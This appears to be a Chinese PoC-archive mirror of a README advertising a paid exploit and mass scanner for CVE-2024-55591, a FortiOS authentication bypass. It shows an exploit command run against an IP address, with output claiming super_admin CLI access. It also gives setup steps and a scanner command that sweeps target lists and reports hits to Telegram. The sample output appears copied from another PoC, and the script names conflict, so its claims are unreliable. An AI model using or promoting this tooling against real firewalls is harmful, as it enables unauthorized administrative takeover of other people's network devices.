关联漏洞
标题:
Fortinet FortiOS和FortiProxy 安全漏洞
(CVE-2024-55591)
描述:Fortinet FortiOS和Fortinet FortiProxy都是美国飞塔(Fortinet)公司的产品。Fortinet FortiOS是一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。Fortinet FortiProxy是一种安全的网络代理,通过结合多种检测技术,如Web过滤、DNS过滤、DLP、反病毒、入侵防御和高级威胁保护,可以保护员工免受网络攻击。FortiProxy有助于减
介绍
# CVE-2024-55591: FortiOS Authentication Bypass
**If you’re reading this, you most likely know what we’re talking about.**
## *[Download](https://satoshidisk.com/pay/CO99uu) - JUST TAKE IT*
---
# Detection in Action
```
python3 binarywarm-exp.py --host 192.104.119.11 --port 443 --command "show user local" --ssl
██████╗ ██╗███╗ ██╗ █████╗ ██████╗ ██╗ ██╗ ██╗ ██╗ █████╗ ██████╗ ███╗ ███╗
██╔══██╗██║████╗ ██║██╔══██╗██╔══██╗╚██╗ ██╔╝ ██║ ██║██╔══██╗██╔══██╗████╗ ████║
██████╔╝██║██╔██╗ ██║███████║██████╔╝ ╚████╔╝ ██║ █╗ ██║███████║██████╔╝██╔████╔██║
██╔══██╗██║██║╚██╗██║██╔══██║██╔══██╗ ╚██╔╝ ██║███╗██║██╔══██║██╔══██╗██║╚██╔╝██║
██████╔╝██║██║ ╚████║██║ ██║██║ ██║ ██║ ╚███╔███╔╝██║ ██║██║ ██║██║ ╚═╝ ██║
╚═════╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
binarywarm-exp.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by binarywarm
CVEs: [CVE-2024-55591]
[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337
Output from server: �
get system status
Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0
FAKESERIAL #
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)
```
---
# Description
A critical authentication bypass vulnerability in FortiOS (versions 7.4.0-7.4.2 and 7.2.0-7.2.6) allows unauthorized administrative access through WebSocket protocol manipulation. This repository contains two tools:
1. **Exploit (exp.py)** - Proof-of-Concept for vulnerability exploitation
2. **Scanner (scanner-cve2024-55591.py)** - Mass detection tool with Telegram notifications
---
# Technical Details
**Vulnerability Type**: Session Hijacking via WebSocket Negotiation
**Attack Vector**:
- WebSocket handshake manipulation with forged headers
- Invalid session token acceptance
- Privileged CLI command execution
# Pentest Environment Setup in `scrypt` Directory
## 1. Initial Server Configuration
### Update system and install core tools
```
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y git python3.10-venv python3-pip python3-dev build-essential libssl-dev libffi-dev ca-certificates
```
**Affected Components**:
- `/ws/cli/open` WebSocket endpoint
- Service Worker API (`/service-worker.js`)
## 2. Install base dependencies
```
sudo apt install -y python3 python3-venv python3-pip git
```
## 3. Create project directory and navigate to it
```
mkdir /scrypt && cd /scrypt
```
## 4. Create Python virtual environment named "pentest"
```
python3 -m venv pentest
```
## 5. Activate virtual environment
```
source pentest/bin/activate
```
## 6. Install required Python packages
```
pip install requests urllib3 python-telegram-bot
```
## 7. Move the files exp.py, scanner.py, and targets.txt to the /scrypt directory
---
---
# Vulnerability searching
## Description
The script cve2032copy2.py scans a list of Fortinet addresses (listed line-by-line in a text file) for the reported vulnerability
and sends positive detection results to your Telegram bot.
## Start scanner
```
python3 scanner-cve2024-55591.py --file targets.txt --port 443
```
文件快照
[4.0K] /data/pocs/9a1ad0a6b334b8791cd95154824afe8505458d35
└── [4.9K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。